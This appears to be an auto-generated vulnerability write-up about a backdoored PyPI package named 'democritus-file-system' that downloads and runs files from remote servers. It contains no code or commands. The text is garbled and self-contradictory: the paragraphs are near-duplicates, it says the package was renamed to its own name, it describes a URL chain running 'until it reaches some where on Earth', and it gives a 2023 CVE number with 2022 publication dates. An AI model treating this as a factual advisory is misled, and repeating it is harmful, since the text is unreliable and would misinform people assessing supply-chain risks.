The package name was changed from democritus-file-system to democritus-file-system-backdoor. The good news is that the package hasn’t been updated since then. The package was only distributed via PyPI. Installing the package via pip didn’t cause any immediate issues. However, if the package was updated, the updated version would be installed instead of the old version.
Some of the files in the package contained code that could be executed by anyone with the package installed. The affected files included an XML file and a file that contained a URL. The URL pointed to a package on another PyPI server. It contained code that could be executed by anyone with the package installed. The code would download and execute a file from another server, containing a URL. This URL would point to a different package on another PyPI server.
Conclusion: Stay Vigilant
This was a great reminder to always stay vigilant and use caution when installing any package.
CVE-2023-40812
The package name was changed from democritus-file-system to democritus-file-system. The good news is that the package hasn’t been updated since then. The package was only distributed via PyPI. Installing the new version of the package won’t cause any immediate issues. However, if the package was updated, the updated version would be installed instead of the old version.
Some of the files in the package contained code that could be executed by anyone with the package installed. The affected files included an XML file and a file that contained a URL. The URL pointed to a different server than before, but it still pointed to a third party website, which in turn downloads and executes a file from another server, containing a URL. This URL points to yet another pyPI server, which will download and execute a file from yet another third party website, containing yet another URL and so on until it reaches some where on Earth.
Timeline
Published on: 09/19/2022 15:15:00 UTC
Last modified on: 09/21/2022 15:39:00 UTC